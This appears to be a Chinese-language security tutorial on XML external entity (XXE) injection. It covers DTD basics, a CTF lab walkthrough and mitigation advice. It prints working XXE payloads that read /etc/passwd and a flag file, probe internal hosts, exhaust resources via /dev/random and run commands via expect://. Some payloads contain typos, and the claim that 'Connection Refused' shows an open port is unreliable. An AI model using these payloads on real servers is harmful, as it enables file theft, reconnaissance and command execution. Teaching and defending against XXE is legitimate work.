XXE漏洞简介

(1)XXE漏洞全称XML External Entity Injection，即xmI外部实体注入漏洞， XXE漏洞发生在应用程序解析XML输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害，XML(也是一种语言)被设计用来传输和存储数据
(2)也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制，从而导致漏洞

DTD(Document Type Definition 文档类型定义)

1.DTD实体是用于定义引用普通文本或特殊字符的快捷方式的变量，可以内部声明或外部引用
2.外部实体(即可能存在漏洞的地方)声明：<!ENTITY 实体名称 SYSTEM "URI">
3.通过URL的不同访问而造成不同影响

下图为XML文档的一个完整简单的组成

解析：
(1)在DTD中，定义name为实体名，后面url为实体文本
(2)在XML元素中，&name表示实体变量，实际值为DTD定义的实体文本，即URL
(3)服务器后台解析执行代码元素，实际上服务器就是访问url，并且可能会把执行结果返回给用户，即漏洞存在

一.什么是XXE漏洞?

除了json外，xml也是一种常用的数据传输格式。对xml的解析有以下几种常用的方式：DOM，SAX，JDOM，DOM4J，StAX等。然而这几种解析方式都可能会出现外部实体注入漏洞,这类漏洞统称 XML 外部实体漏洞。

提到这里我们就要明白xml的格式,尤其是xml的实体含义,显然那不是本文的重点,不明白的朋友可以去弄明白XML的格式定义含义(参考链接: )

以下提供一个请求如果接受的值是xml格式数据,则会存在xxe漏洞,我们使用下面简单的xml内容来分析:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [   
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

在上面的代码中,xml外部实体 xxe 被赋值为 file://etc/passwd 内容的值(也就是paswd文件的内容),关键字SYSTEM 会告诉XML解析器, xxe 实体的值是从其后的URI中获取.

简单说就是攻击者强制XML解析器去访问攻击者指定的资源内容(可能是系统上本地文件/远程系统上的文件).

二.XXE漏洞的应用场景

许多较早的或配置错误的XML处理器评估了XML文件中的外部实体引用。攻击者可以利用外部实体窃取使用URI文件处理器的内部文件和共享文件、监听内部扫描端口、执行远程代码和实施拒绝服务攻击。

大量XXE缺陷已经被发现并被公开，这些缺陷包括嵌入式设备的XXE缺陷。最简单的方法是上传可被接受的恶意XML文件：

场景 #1：攻击者尝试从服务端提取数据：

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<foo>&xxe;</foo>

场景 #2：攻击者通过将上面的实体行更改为以下内容来探测服务
器的专用网络：

<!ENTITY xxe SYSTEM "https://192.168.1.1/private" >]>

场景 #3：攻击者通过恶意文件执行拒绝服务攻击：

<!ENTITY xxe SYSTEM "file:///dev/random" >]>

总结:
通过xml解析器存在的漏洞, 基于URI的方式访问一些协议(比如 file, ftp,dict, gopher,expect…)下的资源非法获取一些服务器上的文件,或者将外部的文件通过实体的方式写入服务器.

三.XXE漏洞的解决办法

开发人员培训是识别和减少XXE缺陷的关键，此外，防止XXE陷还需要：
• 尽可能使用简单的数据格式（如： JSON），避免对敏感数据行序列化。
• 及时修复或更新应用程序或底层操作系统使用的所有XML处和库。同时，通过依赖项检测，将SOAP更新到1.2版本或更版本。
• 在应用的所有XML解析器中禁用XML外部实体和DTD进程。
• 在服务器端实施积极的（“白名单”）输入验证、过滤和清以防止在XML文档、标题或节点中出现恶意数据。
• 验证XML或XSL文件上传功能是否使用XSD验证或其他类似方法来验证上传的XML文件。
• 尽管在许多集成环境中，手动代码审查是大型、复杂应用程最佳选择，但是SAST 工具可以检测源代码中的XXE漏洞。

xxe漏洞原理

• Web应用的脚本代码没有限制XML引入外部实体，从而导致测试者可以创建一个包含外部实体的XML，使得其中的内容会被服务器端执行
• 当允许引用外部实体时，通过构造恶意内容，就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害

xxe联系靶场

http://web.jarvisoj.com:9882/

复现步骤

打开代理进行抓包操作

明显看到使用的是json读取

 我们将包放进重发模块修改成xml读取方式

 读取flag包

<?xml version = "1.0"?> <!DOCTYPE ANY [ <!ENTITY f SYSTEM "file:///home/ctf/flag.txt"> ]> <x>&f;</x>

其他的执行未截图，感兴趣的可以试一试

执行系统命令

如果服务器环境中安装了某些特定的扩展，即可利用其造成任意命令执行，如攻击者构造如下的XML文档：

<?xml version="1.0" encoding-"utf-8"?><!DOCTYPE ANY [<!ENTITY xxe SYSTEM "expect://whoami">]><x>&xxe;</x>

读取任意文件命令

如果攻击者可以控制服务器解析的XML文档的内容，引入攻击者想要读取的文件内容作为外部实体，即可尝试读取任意的文件内容。如攻击者构造如下的XML文档就会将/etc/passwd文件的内容引入进来并回显在页面中，造成敏感文件内容泄露。

<?xm1 version="1.0" encoding-"utf-8"?><!DOCTYPE ANY[<!ENTITY xxe SYSTEM "file:///etc/passwd">]><x>&xxe;</x>

探测内网接口

如果Web服务器的的执行环境在内网，则可以通过请求内网IP的某个端口来判断该IP 的相应端口是否开放，这可以通过直接引用外部实体的方式引入要访问该端口的链接即可实现：

<？xm1 version="1.0" encoding="utf-8"?>
<！DOCTYPE ANY [ 
   <！ENTITY xxe SYSTEM http://ip:80/mark
]>
<x>&xxe</x>
如果回显结果为“Connection Refused”，即可以判断该IP的80端口是开放的。

如何防御xxe漏洞

1.使用开发语言提供的禁用外部实体的方法

2.过滤用户提交的XML数据，过滤关键词

3.使用第三方应用代码及时升级补丁